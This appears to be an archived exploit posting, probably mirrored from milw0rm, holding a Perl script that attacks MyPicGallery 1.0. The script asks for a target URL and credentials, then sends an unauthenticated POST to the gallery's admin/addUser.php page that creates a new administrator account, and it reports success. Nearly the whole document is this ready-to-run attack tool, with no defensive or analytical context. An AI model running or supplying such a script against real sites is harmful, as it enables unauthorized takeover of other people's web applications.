Home / os / win10

mypicgallery-admin.txt

Posted on 20 May 2008

#!/usr/bin/perl use strict; use LWP::UserAgent; print "-+--[ MyPicGallery 1.0 Arbitrary Add-Admin Exploit ]--+- "; print "-+-- Discovered && Coded By: t0pP8uZz --+- "; print "-+-- Discovered On: 16 MAY 2008 / h4ck-y0u, milw0rm --+- "; print "-+--[ MyPicGallery 1.0 Arbitrary Add-Admin Exploit ]--+- "; print " Enter URL(http://site.com): "; chomp(my $url=<STDIN>); print " Enter Username(create's a admin username): "; chomp(my $usr=<STDIN>); print " Enter Password(create's a admin password): "; chomp(my $pwd=<STDIN>); my $ua = LWP::UserAgent->new( agent => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" ); my $ob = $ua->post( $url."/admin/addUser.php?userID=admin", { "submit" => 1, # ugly? "fullName" => "null", "userName" => $usr, "password" => $pwd, "conPassword" => $pwd, "uType" => "admin", "email" => "null@null.com" } ); if($ob->is_success && index($ob->content, "added") != -1) { print " Admin Account Added! Login at: ".$url." "; } else { print " Exploit Failed! username already exists?"; }

 

TOP